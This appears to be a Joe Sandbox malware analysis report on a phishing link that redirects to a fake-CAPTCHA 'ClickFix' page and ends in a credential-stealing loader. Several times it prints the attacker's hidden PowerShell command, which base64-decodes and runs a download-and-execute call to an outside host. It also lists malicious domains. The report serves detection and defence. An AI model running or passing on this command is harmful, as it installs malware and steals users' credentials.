Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w

Overview

General Information

Sample URL:https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w
Analysis ID:1700849
Infos:

Detection

CAPTCHA Scam ClickFix, ReflectiveLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Decrypt And Execute Base64 Data
Yara detected CAPTCHA Scam ClickFix
Yara detected ReflectiveLoader
AI detected suspicious URL
HTML page adds supicious text to clipboard
Installs a global event hook (focus changed)
Installs a global keyboard hook
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected suspicious crossdomain redirect
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses a Windows Living Off The Land Binaries (LOL bins)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 3092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,18405873602495973812,11393449269972753126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 1420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 456 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AtBroker.exe (PID: 7380 cmdline: atbroker.exe /start narrator /hardwarebuttonlaunch MD5: 30076E434A015BDF4C136E09351882CC)
    • AtBroker.exe (PID: 7420 cmdline: C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch MD5: 30076E434A015BDF4C136E09351882CC)
      • Narrator.exe (PID: 7440 cmdline: "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch MD5: D92DEFAA4D346278480D2780325D8D18)
      • Narrator.exe (PID: 5664 cmdline: "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch MD5: D92DEFAA4D346278480D2780325D8D18)
  • powershell.exe (PID: 636 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 40279737-1c0a-47e7-b4ac-3a849a46e40d.exe (PID: 3788 cmdline: "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" 0xaa79fbd8 MD5: 286803E09EA7F8FFECA53A4F6A882EFA)
      • winver.exe (PID: 7220 cmdline: C:\Windows\System32\winver.exe MD5: 63DC2D604B8A96C9962494D1D957DD77)
      • ComputerDefaults.exe (PID: 5416 cmdline: C:\Windows\System32\ComputerDefaults.exe MD5: D25A9E160E3B74EF2242023726F15416)
        • 40279737-1c0a-47e7-b4ac-3a849a46e40d.exe (PID: 4256 cmdline: "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" MD5: 286803E09EA7F8FFECA53A4F6A882EFA)
          • WerFault.exe (PID: 6868 cmdline: C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • NarratorQuickStart.exe (PID: 3996 cmdline: "C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe" -ServerName:App.AppX2nbh7wcbt82z2dktjrtwk4f36gf9xxh2.mca MD5: 0F6BF15D33BD8E98FD906CF8BF3484DD)
  • cleanup

AI Reasoning

No reasoning have been found

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.2278146446.000001F58C8DF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ReflectiveLoader_1Yara detected ReflectiveLoaderJoe Security
    00000014.00000002.2277861314.000001F58BFD0000.00000004.08000000.00040000.00000007.sdmpJoeSecurity_ReflectiveLoader_1Yara detected ReflectiveLoaderJoe Security
      0000001D.00000002.2269970604.0000000002F80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000014.00000002.2278146446.000001F58DBEE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ReflectiveLoader_1Yara detected ReflectiveLoaderJoe Security

          HTML

          SourceRuleDescriptionAuthorStrings
          3.5.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
            3.4.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell IEX Execution Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 456, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Sigma detected: Powershell Decrypt And Execute Base64 Data
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-05-28T17:11:26.554884+020028033053Unknown Traffic192.168.2.1749760172.67.218.142443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-05-28T17:11:26.066347+020028032742Potentially Bad Traffic192.168.2.1749760172.67.218.142443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-05-28T17:11:26.067692+020018100032Potentially Bad Traffic172.67.218.142443192.168.2.1749760TCP
              2025-05-28T17:11:26.557533+020018100032Potentially Bad Traffic172.67.218.142443192.168.2.1749760TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-05-28T17:11:24.982239+020018100002Potentially Bad Traffic192.168.2.1749760172.67.218.142443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeReversingLabs: Detection: 58%

              Phishing

              barindex
              Yara detected CAPTCHA Scam ClickFix
              Source: Yara matchFile source: 3.5.pages.csv, type: HTML
              Source: Yara matchFile source: 3.4.pages.csv, type: HTML
              AI detected suspicious URL
              Source: https://google.com@vstrrrlineproperrms.worldJoe Sandbox AI: The URL uses 'google.com' as part of the userinfo section before the '@' symbol, which is a common technique to mislead users into thinking they are visiting a legitimate Google site. The actual domain is 'vstrrrlineproperrms.world', which does not have any clear association with Google. The use of multiple 'r' characters in 'vstrrrlineproperrms' suggests an attempt to create a visually confusing or complex domain name, potentially to obscure its true nature. The '.world' TLD does not inherently suggest a connection to Google, and the overall structure of the URL is likely to confuse users. The similarity score is high due to the presence of 'google.com' in the userinfo section, and the spoofed score is high due to the deceptive structure and potential for user confusion.
              Source: https://google.com@vstrrrlineproperrms.world/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
              Source: https://google.com@vstrrrlineproperrms.world/HTTP Parser: No favicon
              Source: https://google.com@vstrrrlineproperrms.world/HTTP Parser: No favicon
              Source: https://google.com@vstrrrlineproperrms.world/HTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.17:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.123.129.254:443 -> 192.168.2.17:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.17:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.218.142:443 -> 192.168.2.17:49760 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 6MB later: 36MB
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: gtoyorupaz.activehosted.com to https://google.com@vstrrrlineproperrms.world
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: gtoyorupaz.activehosted.com to https://google.com@vstrrrlineproperrms.world
              Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: gz
              Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: gz
              Source: global trafficHTTP traffic detected: GET /apic/Qkqxz/EJDGUe HTTP/1.1Host: apioeks.icu
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49760 -> 172.67.218.142:443
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.17:49760 -> 172.67.218.142:443
              Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 172.67.218.142:443 -> 192.168.2.17:49760
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:49760 -> 172.67.218.142:443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 74.125.137.94
              Source: unknownTCP traffic detected without corresponding DNS query: 74.125.137.94
              Source: unknownTCP traffic detected without corresponding DNS query: 74.125.137.94
              Source: unknownTCP traffic detected without corresponding DNS query: 74.125.137.94
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.emlnk9.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.activehosted.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1host: vstrrrlineproperrms.worldupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
